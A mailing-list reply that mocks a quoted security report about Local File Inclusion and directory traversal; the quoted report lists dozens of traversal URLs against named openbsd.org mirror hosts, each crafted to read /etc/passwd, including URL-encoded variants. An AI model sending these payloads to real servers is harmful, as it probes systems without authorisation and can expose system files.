Oh my aren't you the clever one! Your closing sentence:
> This information may then be used to advance an attack. By all means, please show how you do that. Srikar V <[email protected]> wrote: > An attacker can use Local File Inclusion (LFI) to trick the web application > into exposing or running files on the web server. An LFI attack may lead to > information disclosure, remote code execution, or even Cross-site Scripting > (XSS). Typically, LFI occurs when an application uses the path to a file as > input. If the application treats this input as trusted, a local file may be > used in the include statement. > > > Directory Traversal > Even without the ability to upload and execute code, a Local File Inclusion > vulnerability can be dangerous. An attacker can still perform a Directory > Traversal / Path Traversal attack using an LFI vulnerability as follows. > > http://example.com/?file=../../../../etc/passwd > In the above example, an attacker can get the contents of the /etc/passwd > file that contains a list of users on the server. Similarly, an attacker > may leverage the Directory Traversal vulnerability to access log files (for > example, Apache access.log or error.log), source code, and other sensitive > information. This information may then be used to advance an attack. > > > VULNERABLE ENDPOINTS: > > http://ftp.usa.openbsd.org/node_modules/../../../../../etc/passwd > http://ftp.usa.openbsd.org/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ > http://ftp.usa.openbsd.org/static/../../../a/../../../../etc/passwd > https://ftp5.usa.openbsd.org/node_modules/../../../../../etc/passwd > https://ftp5.usa.openbsd.org/..%%2f..%%2f..%%2f..%%2f..%%2f..%%2f..%%2fetc/passwd > http://ftp5.usa.openbsd.org/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ > http://ftp4.usa.openbsd.org/node_modules/../../../../../etc/passwd > https://ftp4.usa.openbsd.org/node_modules/../../../../../etc/passwd > https://ftp4.usa.openbsd.org/..%%2f..%%2f..%%2f..%%2f..%%2f..%%2f..%%2fetc/passwd > https://ftp4.usa.openbsd.org/static/../../../a/../../../../etc/passwd > https://ftp4.usa.openbsd.org/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ > http://ftp5.usa.openbsd.org/node_modules/../../../../../etc/passwd > http://ftp5.usa.openbsd.org/..%%2f..%%2f..%%2f..%%2f..%%2f..%%2f..%%2fetc/passwd > http://ftp5.usa.openbsd.org/static/../../../a/../../../../etc/passwd > https://ftp5.usa.openbsd.org/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ > https://ftp3.usa.openbsd.org/node_modules/../../../../../etc/passwd > http://ftp3.usa.openbsd.org/node_modules/../../../../../etc/passwd > http://ftp3.usa.openbsd.org/..%%2f..%%2f..%%2f..%%2f..%%2f..%%2f..%%2fetc/passwd > http://ftp3.usa.openbsd.org/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ > https://ftp3.usa.openbsd.org/..%%2f..%%2f..%%2f..%%2f..%%2f..%%2f..%%2fetc/passwd > https://ftp5.usa.openbsd.org/static/../../../a/../../../../etc/passwd > https://ftp3.usa.openbsd.org/static/../../../a/../../../../etc/passwd > http://ftp3.usa.openbsd.org/static/../../../a/../../../../etc/passwd > http://anoncvs4.usa.openbsd.org/node_modules/../../../../../etc/passwd > http://anoncvs4.usa.openbsd.org/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ > http://anoncvs4.usa.openbsd.org/..%%2f..%%2f..%%2f..%%2f..%%2f..%%2f..%%2fetc/passwd > https://anoncvs4.usa.openbsd.org/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ > https://anoncvs4.usa.openbsd.org/static/../../../a/../../../../etc/passwd
